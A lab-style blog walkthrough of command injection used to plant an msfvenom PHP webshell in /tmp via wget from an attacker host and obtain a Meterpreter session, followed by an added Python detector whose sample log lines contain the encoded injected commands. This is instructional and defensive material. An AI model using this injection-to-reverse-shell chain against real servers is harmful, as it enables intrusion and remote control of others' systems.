Friday, April 13, 2018
Command Injection (IV): Webshell -> Msfvenom / Meterpreter
- Layout for this exercise:
- This exercise is based on the previous one:
http://www.whitelist1.com/2018/04/command-injection-attack.html
- The goal of this exercise is to obtain a meterpreter session by injecting a PHP webshell through the URL bar of the attacker's browser.
- First of all, let's have a look at the options of the reverse_tcp payload available in Metasploit:
- The only option required is LHOST, corresponding to the attacker's IP.
- Based on this payload, msfvenom generates the webshell pm.php:
- Opening the file shows a couple of characters, /*, that must be removed for the PHP script to be executable:
- On the attacker's side, let's start a SimpleHTTPServer listening on port 8000:
- Now it is time to launch the attack using the wget command, with the -O option indicating where to write the output, in this case the folder /tmp.
- Why the folder /tmp? Because it is usually writable on most systems, which avoids the problem of finding a writable location on the filesystem in which to store our malicious webshell pm.php:
- On the attacker's side, the successful transfer is logged:
- The attacker (Kali) can also confirm that this phase of the attack went well by locating the transferred webshell pm.php in the folder /tmp:
- Before running the webshell, let's open a listening session on the attacker's side (IP 192.168.1.10 on port 4444) with a Metasploit handler:
- Finally, the webshell pm.php is executed with the command php -f:
- The attack is successful: a meterpreter session is established immediately as a consequence of running the webshell:
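
From the defender's side, both injected commands in this exercise (the wget download with -O into /tmp and the php -f execution from /tmp) leave recognizable traces in the web server's access log. The following detection sketch is an added example, not part of the original post; the Apache-style log format, the /ping.php path and the ip parameter name are assumptions, and the log lines are constructed:

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines; the path and the "ip" parameter are assumed.
SAMPLE_LOG = [
    '192.168.1.10 - - [13/Apr/2018:10:00:01 +0000] "GET /ping.php?ip=127.0.0.1 HTTP/1.1" 200 512',
    '192.168.1.10 - - [13/Apr/2018:10:00:09 +0000] "GET /ping.php?ip=127.0.0.1%3Bwget%20'
    'http%3A%2F%2F192.168.1.10%3A8000%2Fpm.php%20-O%20%2Ftmp%2Fpm.php HTTP/1.1" 200 498',
    '192.168.1.10 - - [13/Apr/2018:10:00:30 +0000] "GET /ping.php?ip=127.0.0.1%3Bphp+-f+'
    '%2Ftmp%2Fpm.php HTTP/1.1" 200 0',
]

# World-writable directories commonly used as a staging area.
STAGING = r"/(?:tmp|var/tmp|dev/shm)/"

RULES = {
    # A downloader writing its output into a staging directory.
    "download_to_tmp": re.compile(r"\b(?:wget|curl)\b[^;|&]*\s-[oO]\s*" + STAGING, re.I),
    # The PHP CLI executing a script that lives in a staging directory.
    "exec_from_tmp": re.compile(r"\bphp\s+(?:-f\s+)?" + STAGING + r"\S+", re.I),
    # Shell metacharacters that chain or substitute commands.
    "shell_separator": re.compile(r"[;|&`]|\$\("),
}

# Client address and request target from a common/combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def scan(lines):
    """Return (client, parameter, sorted rule names) for each suspicious parameter."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl percent-decodes values, so encoded payloads are matched too.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            hits = sorted(rule for rule, rx in RULES.items() if rx.search(value))
            if hits:
                findings.append((client, name, hits))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only GET query strings are inspected here; POST bodies are not written to standard access logs and need WAF or application-level logging to be covered.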